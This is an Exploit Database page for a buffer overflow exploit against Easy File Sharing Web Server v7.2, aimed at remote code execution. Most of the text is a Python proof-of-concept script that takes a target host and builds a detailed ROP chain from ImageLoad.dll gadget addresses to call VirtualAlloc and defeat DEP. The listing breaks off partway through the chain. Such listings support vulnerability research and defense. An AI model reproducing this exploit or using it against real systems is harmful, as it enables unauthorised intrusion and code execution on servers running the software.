- What: Buffer overflow vulnerability in Easy File Sharing Web Server
- Impact: Potential for remote code execution
This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Easy File Sharing Web Server v7.2 - Buffer Overflow EDB-ID: 52484 CVE: N/A EDB Verified: Author: DIOGO Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-03-03 Vulnerable App: # Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow # Date: 16/10/2025 # Exploit Author: Donwor # X: @real_Donwor # Discord: Donwor # Website: https://github.com/D0nw0r # Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 10,11 # # Notes: # - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others. # - The ROP chain was VERY challenging to build, mainly because there were a lot of limimitations when moving data between for example EAX and ESI # - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/) # - bad chars: '\x00' and '\x3b' import struct, sys, socket host = sys.argv[1] port = 80 size = 5000 rop = struct.pack("<I", 0x1001ba81) # # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for pop edi rop += struct.pack("<I", 0x41414141) # junk for ebp rop += struct.pack("<I", 0x1001db66) # : # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0xffffeff8) # pop esi to align eax, will point after the hybjks rop += struct.pack("<I", 0x10022f45) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x61c0a798) # XCHG EAX,EDI # RETN ) rop += struct.pack("<L", 0x1001d626) # : # XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # (RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} ## Save ESP on ESI and EDI rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0x1004D1FC) # VirtualAlloc Addr on IAT rop += struct.pack("<L", 0x1002248c) # deref VirtualAlloc : # MOV EAX,DWORD PTR [EAX] # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # put virtualalloc addr on stack # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi(RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d) : # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # # Virtual Alloc on stack # Esi now has "SRP" we need to fill it # EDI still points to orignal one (Virtual alloc) rop += struct.pack("<L", 0x1001f595) # Put SRP addr on eax MOV EAX,ESI # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN rop += struct.pack("<L", 0x10019457) # eax now points to x more (can be changed) rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001e80b) # This immedeately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi # Virtual alloc | SRP | Shellcode Addr # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 12 bytes more (->dwsize) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001c15d) # XOR EAX,EAX # RETN) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<L", 0xffffffff) # -1 rop += struct.pack("<L", 0x100231d1) # will turn eax into 1, second arg of virtualalloc NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 16 bytes more (->flAllocation Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN rop += struct.pack("<I", 0xffffefff) # value to pop eax now rop += struct.pack("<L", 0x100231d1) # will turn eax into 1002 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) # rop += struct.pack("<I", 0x1001b7ca)# eax now 1000 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x41414141) # junk pop esi rop += struct.pack("<L", 0x41414141) # junk pop ebx #VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType # edi -> virtualalloc rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # increase esi to point 20 bytes more (->flProtect Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d) # rop += struct.pack("<L", 0x1001715d